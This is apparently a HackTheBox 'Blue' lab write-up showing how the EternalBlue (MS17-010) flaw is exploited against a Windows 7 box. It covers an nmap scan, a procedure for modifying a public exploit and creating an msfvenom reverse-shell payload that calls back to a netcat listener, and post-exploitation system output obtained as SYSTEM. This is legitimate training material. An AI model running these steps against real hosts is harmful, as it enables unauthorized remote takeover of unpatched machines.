HackTheBox | Blue

Nmap Results

# Nmap 7.92 scan initiated Sun Aug 14 19:46:21 2022 as: nmap -T5 -p- -oA scan -Pn
Warning: giving up on port because retransmission cap hit (2).
Nmap scan report for
Host is up (0.017s latency).
Not shown: 65524 closed tcp ports (reset)
135/tcp   open     msrpc
139/tcp   open     netbios-ssn
445/tcp   open     microsoft-ds
32021/tcp filtered unknown
49152/tcp open     unknown
49153/tcp open     unknown
49154/tcp open     unknown
49155/tcp open     unknown
49156/tcp open     unknown
49157/tcp open     unknown
60080/tcp filtered unknown

# Nmap done at Sun Aug 14 19:46:52 2022 -- 1 IP address (1 host up) scanned in 30.51 seconds

Service Enumeration


nmap OS detection identifies this host as Microsoft Windows Server 2008 SP1 , while the SMB headers say the host is Windows 7 Professional 7601 Service Pack 1. Either way, given the host operating system and unenforced SMB signing, this looks like a perfect candidate for MS17-010 (Eternal Blue); no coincidence given the name of the box.


Search Google for public exploits on GitHub: site:github.com "ms17-010" . This repo should work perfectly for our target operating system.

GitHub - helviojunior/MS17-010: MS17-010
MS17-010. Contribute to helviojunior/MS17-010 development by creating an account on GitHub.

The send_and_execute.py exploit will allow us to generate a malicious binary, transfer it to the target, and execute via named pipe.

  1. git clone <repo url>
  2. cd MS17-010
  3. Edit send_and_execute.py and change USERNAME = '' to USERNAME = ' ' (with a space), to allow anonymous authentication
  4. Generate a payload: msfvenom -p windows/shell_reverse_tcp LHOST=kali-vpn-ip LPORT=kali-tcp-port EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -a x86 --platform windows -f exe -o pwn.exe
  5. Start a netcat listener on your specified port
  6. Run the exploit: python2 send_and_execute.py target-ip binary.exe

Post-Exploit Enumeration

Operating Environment

OS & Kernel


Host Name:                 HARIS-PC
OS Name:                   Microsoft Windows 7 Professional 
OS Version:                6.1.7601 Service Pack 1 Build 7601
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          haris
Registered Organization:   
Product ID:                00371-222-9819843-86066
Original Install Date:     14/07/2017, 14:45:30
System Boot Time:          15/08/2022, 01:49:12
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2294 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-gb;English (United Kingdom)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC) Dublin, Edinburgh, Lisbon, London
Total Physical Memory:     2,047 MB
Available Physical Memory: 1,576 MB
Virtual Memory: Max Size:  4,095 MB
Virtual Memory: Available: 3,546 MB
Virtual Memory: In Use:    549 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 178 Hotfix(s) Installed.
                           [01]: KB2849697
                           [02]: KB2849696
                           [03]: KB2841134
                           [04]: KB2670838
                           [05]: KB2479943
                           [06]: KB2491683
                           [07]: KB2506014
                           [08]: KB2506212
                           [09]: KB2506928
                           [10]: KB2509553
                           [11]: KB2533552
                           [12]: KB2534111
                           [13]: KB2545698
                           [14]: KB2547666
                           [15]: KB2552343
                           [16]: KB2560656
                           [17]: KB2563227
                           [18]: KB2564958
                           [19]: KB2579686
                           [20]: KB2603229
                           [21]: KB2604115
                           [22]: KB2620704
                           [23]: KB2621440
                           [24]: KB2631813
                           [25]: KB2639308
                           [26]: KB2640148
                           [27]: KB2654428
                           [28]: KB2660075
                           [29]: KB2667402
                           [30]: KB2685811
                           [31]: KB2685813
                           [32]: KB2690533
                           [33]: KB2698365
                           [34]: KB2705219
                           [35]: KB2719857
                           [36]: KB2726535
                           [37]: KB2727528
                           [38]: KB2729094
                           [39]: KB2732059
                           [40]: KB2732487
                           [41]: KB2736422
                           [42]: KB2742599
                           [43]: KB2750841
                           [44]: KB2761217
                           [45]: KB2763523
                           [46]: KB2770660
                           [47]: KB2773072
                           [48]: KB2786081
                           [49]: KB2791765
                           [50]: KB2799926
                           [51]: KB2800095
                           [52]: KB2807986
                           [53]: KB2808679
                           [54]: KB2813430
                           [55]: KB2834140
                           [56]: KB2840631
                           [57]: KB2843630
                           [58]: KB2847927
                           [59]: KB2852386
                           [60]: KB2853952
                           [61]: KB2861698
                           [62]: KB2862152
                           [63]: KB2862330
                           [64]: KB2862335
                           [65]: KB2864202
                           [66]: KB2868038
                           [67]: KB2868116
                           [68]: KB2871997
                           [69]: KB2884256
                           [70]: KB2891804
                           [71]: KB2892074
                           [72]: KB2893294
                           [73]: KB2893519
                           [74]: KB2894844
                           [75]: KB2908783
                           [76]: KB2911501
                           [77]: KB2912390
                           [78]: KB2918077
                           [79]: KB2919469
                           [80]: KB2929733
                           [81]: KB2931356
                           [82]: KB2937610
                           [83]: KB2943357
                           [84]: KB2952664
                           [85]: KB2966583
                           [86]: KB2968294
                           [87]: KB2970228
                           [88]: KB2972100
                           [89]: KB2973112
                           [90]: KB2973201
                           [91]: KB2973351
                           [92]: KB2977292
                           [93]: KB2978120
                           [94]: KB2978742
                           [95]: KB2984972
                           [96]: KB2985461
                           [97]: KB2991963
                           [98]: KB2992611
                           [99]: KB3003743
                           [100]: KB3004361
                           [101]: KB3004375
                           [102]: KB3006121
                           [103]: KB3006137
                           [104]: KB3010788
                           [105]: KB3011780
                           [106]: KB3013531
                           [107]: KB3019978
                           [108]: KB3020370
                           [109]: KB3021674
                           [110]: KB3021917
                           [111]: KB3022777
                           [112]: KB3023215
                           [113]: KB3030377
                           [114]: KB3035126
                           [115]: KB3037574
                           [116]: KB3042553
                           [117]: KB3045685
                           [118]: KB3046017
                           [119]: KB3046269
                           [120]: KB3054476
                           [121]: KB3055642
                           [122]: KB3059317
                           [123]: KB3060716
                           [124]: KB3067903
                           [125]: KB3068708
                           [126]: KB3071756
                           [127]: KB3072305
                           [128]: KB3074543
                           [129]: KB3075220
                           [130]: KB3078601
                           [131]: KB3078667
                           [132]: KB3080149
                           [133]: KB3084135
                           [134]: KB3086255
                           [135]: KB3092601
                           [136]: KB3092627
                           [137]: KB3093513
                           [138]: KB3097989
                           [139]: KB3101722
                           [140]: KB3107998
                           [141]: KB3108371
                           [142]: KB3108381
                           [143]: KB3108664
                           [144]: KB3109103
                           [145]: KB3109560
                           [146]: KB3110329
                           [147]: KB3121255
                           [148]: KB3122648
                           [149]: KB3124275
                           [150]: KB3126587
                           [151]: KB3127220
                           [152]: KB3133977
                           [153]: KB3137061
                           [154]: KB3138378
                           [155]: KB3138612
                           [156]: KB3138910
                           [157]: KB3139398
                           [158]: KB3139914
                           [159]: KB3140245
                           [160]: KB3147071
                           [161]: KB3150220
                           [162]: KB3155178
                           [163]: KB3156016
                           [164]: KB3156019
                           [165]: KB3159398
                           [166]: KB3161102
                           [167]: KB3161949
                           [168]: KB3161958
                           [169]: KB3170455
                           [170]: KB3170735
                           [171]: KB3172605
                           [172]: KB3177467
                           [173]: KB3179573
                           [174]: KB3181988
                           [175]: KB3184143
                           [176]: KB4014504
                           [177]: KB976902
                           [178]: KB982018
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [02]: fe80::6808:33f:815b:2d67
                                 [03]: dead:beef::e02a:2e51:2801:1436
                                 [04]: dead:beef::6808:33f:815b:2d67

Current User

nt authority\system

Users and Groups

Local Users

net user

User accounts for \\

Administrator            Guest                    haris                    
The command completed with one or more errors.

Local Groups

Unable to enumerate due to system error

Network Configurations



Windows IP Configuration

Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : 
   IPv6 Address. . . . . . . . . . . : dead:beef::6808:33f:815b:2d67
   Temporary IPv6 Address. . . . . . : dead:beef::e02a:2e51:2801:1436
   Link-local IPv6 Address . . . . . : fe80::6808:33f:815b:2d67%11
   IPv4 Address. . . . . . . . . . . :
   Subnet Mask . . . . . . . . . . . :
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:35eb%11

Tunnel adapter isatap.{CBC67B8A-5031-412C-AEA7-B3186D30360E}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

Tunnel adapter Teredo Tunneling Pseudo-Interface:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . 

Privilege Escalation

Vulnerable service is running as the SYSTEM account, therefore code execution yields a reverse shell running at the highest integrity level.




